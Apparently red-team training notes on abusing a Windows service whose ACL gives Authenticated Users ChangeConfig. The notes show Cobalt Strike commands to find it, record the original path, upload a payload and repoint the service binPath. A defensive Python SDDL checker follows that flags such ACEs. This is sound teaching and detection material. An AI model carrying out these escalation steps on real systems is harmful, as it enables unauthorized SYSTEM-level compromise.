When a Windows service has weak permissions, such as ChangeConfig granted to all authenticated users, an attacker can escalate privileges by pointing the service binary path at a payload.

To look for weak service permissions in Cobalt Strike:

beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
 
=== Modifiable Services ===
 
    Service 'VulnService2' (State: Running, StartMode: Auto)

SharpUp does not provide details on actual permissions, which we can get manually with Get-ServiceAcl:

beacon> powershell-import C:\Tools\Get-ServiceAcl.ps1
beacon> powershell Get-ServiceAcl -Name VulnService2 | select -expand Access
 
ServiceRights     : ChangeConfig, Start, Stop
AccessControlType : AccessAllowed
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None

For OPSEC purposes, we want to note the original service path so that we can restore it later:

beacon> run sc qc VulnService2
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: VulnService2
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Vulnerable Services\Service 2.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VulnService2
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

A simple reconfiguration and upload of a Cobalt Strike payload does the trick:

beacon> mkdir C:\Temp
beacon> cd C:\Temp
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
 
beacon> run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
[SC] ChangeServiceConfig SUCCESS
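
For the defending side, the same ACL weakness can be found before it is abused. The following is an added example, not part of the original notes or of SharpUp or Get-ServiceAcl: it parses the SDDL string that sc sdshow <service> prints and flags DACL entries that give a broad group ChangeConfig or control of the ACL itself. The SDDL samples are constructed to mirror the ACL shown above, and HardenedService is a hypothetical name.

```python
import re

# SDDL right codes as they apply to service objects.
SERVICE_RIGHTS = {
    "CC": "QueryConfig", "DC": "ChangeConfig", "LC": "QueryStatus",
    "SW": "EnumerateDependents", "RP": "Start", "WP": "Stop",
    "DT": "PauseContinue", "LO": "Interrogate", "CR": "UserDefinedControl",
    "SD": "Delete", "RC": "ReadControl", "WD": "WriteDac", "WO": "WriteOwner",
    "GA": "GenericAll", "GW": "GenericWrite",
}
# The rights worth flagging, as access-mask bits (for ACEs written in hex).
MASK_BITS = {0x2: "ChangeConfig", 0x40000: "WriteDac", 0x80000: "WriteOwner",
             0x10000000: "GenericAll", 0x40000000: "GenericWrite"}
DANGEROUS = set(MASK_BITS.values())
# Broad, low-privileged trustees by SDDL alias.
BROAD = {"AU": "Authenticated Users", "WD": "Everyone", "BU": "BUILTIN\\Users",
         "IU": "INTERACTIVE", "BG": "BUILTIN\\Guests", "AN": "ANONYMOUS LOGON"}

# Constructed sample descriptors (not captured from a real host).
SAMPLES = {
    "VulnService2": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;DCRPWP;;;AU)",
    "HardenedService": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWLOCRRC;;;AU)"
                       "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
}

def rights_names(rights):
    """Decode an ACE rights field given as letter pairs or as a hex mask."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for bit, name in MASK_BITS.items() if mask & bit}
    return {SERVICE_RIGHTS.get(tok, tok) for tok in re.findall("..", rights)}

def risky_aces(sddl):
    """Return [(trustee, [rights])] for DACL allow ACEs that hand a broad
    group control over the service configuration or its ACL."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)  # SACL (S:) is skipped
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1)) if dacl else []:
        fields = ace.split(";")
        if len(fields) != 6 or fields[0] != "A" or fields[5] not in BROAD:
            continue
        bad = sorted(rights_names(fields[2]) & DANGEROUS)
        if bad:
            findings.append((BROAD[fields[5]], bad))
    return findings

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        print(name, risky_aces(sddl) or "ok")
```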